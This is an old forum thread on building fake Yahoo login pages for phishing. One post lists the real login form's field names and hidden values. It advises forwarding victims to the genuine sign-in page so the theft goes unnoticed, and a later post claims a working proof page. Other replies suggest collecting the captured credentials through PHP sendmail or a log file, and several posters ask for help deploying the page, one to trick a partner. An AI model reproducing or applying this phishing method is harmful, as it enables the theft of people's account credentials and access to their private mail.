mrtg
Closed Thread
Page 1 of 2 12 LastLast
Results 1 to 15 of 22

Thread: Fake yahoo logins page !

Hybrid View

  1. #1
    Join Date
    Dec 2005
    Posts
    44

    Thumbs up Fake yahoo logins page !

    Ok we had a lot of discussion on fake yahoo login pages !

    Here is a complete info and readymade material !

    [URL="http://www.evilopinions.com/index.php/topic,5*.0.html"]Click here[/URL]

  2. #2
    Join Date
    Jan 2005
    Posts
    623
    evilopinions

    If you would like to share info please share it on this forum.

    About the fake yahoo login. First i wouldnt recommend trying to make a fake page. BUT if i were to make one i would definately pass the variables to the actual yahoo sign in page to actually log them in. It will be very obvious when the person tries several attempts to login to their account and it says FAILED. just my 2 cents ~

    Here are the form variables:
    Code:
    <form method="post" action="" autocomplete="off" name="login_form">
    
    TRANSFER INTO THIS URL:
    https://login.**********/config/login?
    
    TABLE ID
    ----------------------
    <table id="yreglgtb" summary="form: login information">
    
    
    HIDDEN VALUES
    ----------------------
    
    <input type="hidden" name=".tries" value="*">
    <input type="hidden" name=".src" value="ym">
    <input type="hidden" name=".md5" value="">
    <input type="hidden" name=".hash" value="">
    <input type="hidden" name=".js" value="">
    <input type="hidden" name=".last" value="">
    <input type="hidden" name="promo" value="">
    <input type="hidden" name=".intl" value="us">
    <input type="hidden" name=".bypass" value="">
    <input type="hidden" name=".partner" value="">
    <input type="hidden" name=".u" value="biphleh*qg*0p">
    <input type="hidden" name=".v" value="0">
    <input type="hidden" name=".challenge" value="reo6zZS8uCsac2LWFCOFhIsBXVy7">
    <input type="hidden" name=".yplus" value="">
    <input type="hidden" name=".emailCode" value="">
    <input type="hidden" name="pkg" value="">
    <input type="hidden" name="stepid" value="">
    <input type="hidden" name=".ev" value="">
    <input type="hidden" name="hasMsgr" value="0">
    <input type="hidden" name=".chkP" value="Y">
    <input type="hidden" name=".done" value="http://mail.**********">
    
    USERNAme
    ------------------------------
    <input name="login" id="username" value="" size="*7" class="yreg_ipt" type="text">
    
    PASSWORD
    ------------------------------
    <input name="passwd" id="passwd" value="" size="*7" class="yreg_ipt" type="password">
    
    REMEMBER PASSWORD
    <input type="checkbox" id="persistent" name=".persistent" value="y">
    
    SIGN IN
    -------------------------------
    <input type="submit" value="Sign In">
    The .u value and the .challenge value change everytime the page is re*****ed so these values might rely off of the runtime time and date the page is uploaded which means they would expire.

    I have not tried this nor will i, but hypothetically it should work.
    Last edited by SyntaXmasteR; 12-20-2005 at 04:57 PM.
    [url=http://www.syntax******.info/tools/services.php]Speed Up Windows XP[/url]
    [url=http://www.syntax******.info/tools/ip.php]Get An Ip Address[/url]
    [url=http://www.syntax******.info/tools/base_converter.php]Base Converter[/url]
    --------------------------------
    [URL=http://www.boninroad.com/syntax******/]Old Site[/URL]
    [URL=http://www.syntax******.info]Comming Soon[/URL]

  3. #3
    Join Date
    May 2007
    Posts
    5

    hello need help

    Hello this is Don from UK can you please get me mail server ?

  4. #4
    Join Date
    May 2007
    Posts
    5

    Question help me

    I need fake yahoo page and mail server anybody can help me here is my address [email]waltersmith_*0@**********[/email] you can email me Thank you..!!!

  5. #5
    Join Date
    Sep 2005
    Posts
    2,050
    Quote Originally Posted by sucre View Post
    Hello this is Don from UK can you please get me mail server ?
    All real PHP hosts offer sendmail, which doesn't need an external SMTP server. Any anyway, you can just write logs to a text file instead if that's not possible.

  6. #6
    Join Date
    Sep 2006
    Posts
    1,649
    It depends, many free hosts block the sendmail() function on PHP, the only hosts I know that open the sendmail() function are paid ones. If you find a free host that offers the sendmail() function, please let me know.

  7. #7
    Join Date
    Sep 2006
    Posts
    1,649
    This thread is two months old, idiot. Read our rules before you post or make a new thread.

  8. #8
    Join Date
    Jan 2005
    Posts
    623
    Ok, Ok... curiosity killed the cat! I tried it and it works ~

    Here is proof
    Code:
    http://www.boninroad.com/yahoo.php
    Dont worry, this page was only created for proof, it does not log any information. The form is directed straight to yahoo as you can see in the source.
    Last edited by SyntaXmasteR; 08-08-2006 at 11:08 AM.
    [url=http://www.syntax******.info/tools/services.php]Speed Up Windows XP[/url]
    [url=http://www.syntax******.info/tools/ip.php]Get An Ip Address[/url]
    [url=http://www.syntax******.info/tools/base_converter.php]Base Converter[/url]
    --------------------------------
    [URL=http://www.boninroad.com/syntax******/]Old Site[/URL]
    [URL=http://www.syntax******.info]Comming Soon[/URL]

  9. #9
    Join Date
    Dec 2005
    Posts
    44

    Thumbs up Hmmm ....

    Good job !

    I see that makes sense. I didn't think about it !

  10. #10
    Join Date
    Dec 2005
    Posts
    4

    cool

    I will trick my gay lover!
    Last edited by SyntaXmasteR; 12-21-2005 at 02:34 PM.

  11. #11
    Join Date
    May 2006
    Posts
    1

    Smile question

    hey this looks awsome, i cant wait to try it. just one question, is there a way to do this on a mac. it would make my life so much easier. thanx

  12. #12
    Join Date
    Sep 2005
    Posts
    2,050
    Quote Originally Posted by rubbles2007
    hey this looks awsome, i cant wait to try it. just one question, is there a way to do this on a mac. it would make my life so much easier. thanx
    What do you mean? The scripting languages involved are generic to all computers. All you need is a website (to host the files on), and a text editor. Text editors are included in ALL operating systems.
    Last edited by Ezekiel; 05-31-2006 at 03:55 AM.
    Who needs drugs when you have electrons?

  13. #13
    Join Date
    Aug 2006
    Posts
    1

    kindly help me

    I am not much aware about HTML editing. I belive i can make my own site at geocities.com but apart from that i do not know how to make fake yahoo page. Can anyone pls help me out. What exactly i need to do ??

  14. #14
    Join Date
    Jul 2006
    Posts
    21

    help

    hey umm where do i put my my email in where it sends the info out?
    and wats a good site i could upload it to. could u tell me if this is right i copy all the stuff up the top and paste it to a note pad and i saved to .php
    or is it .html what is it?

    thanks
    Last edited by mitch04; 08-18-2006 at 09:40 PM.

  15. #15
    Join Date
    Jul 2006
    Posts
    21
    anyone know?

Closed Thread

Similar Threads

  1. Yahoo fake login page
    By bukuro5hi in forum Programming
    Replies: 6
    Last Post: 03-06-2010, 06:39 AM
  2. fake yahoo login page
    By drewfever in forum General discussion
    Replies: 1
    Last Post: 07-09-2008, 06:01 PM
  3. Fake Page
    By Christina in forum Internet Privacy
    Replies: 2
    Last Post: 02-22-2006, 04:57 PM
  4. Yahoo ID stolen by fake yahoo page
    By CS-LAND in forum Internet Privacy
    Replies: 0
    Last Post: 12-22-2005, 08:47 AM
  5. how do i make a fake Yahoo loggin page?
    By sxam in forum Internet Privacy
    Replies: 0
    Last Post: 08-05-2005, 02:59 PM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts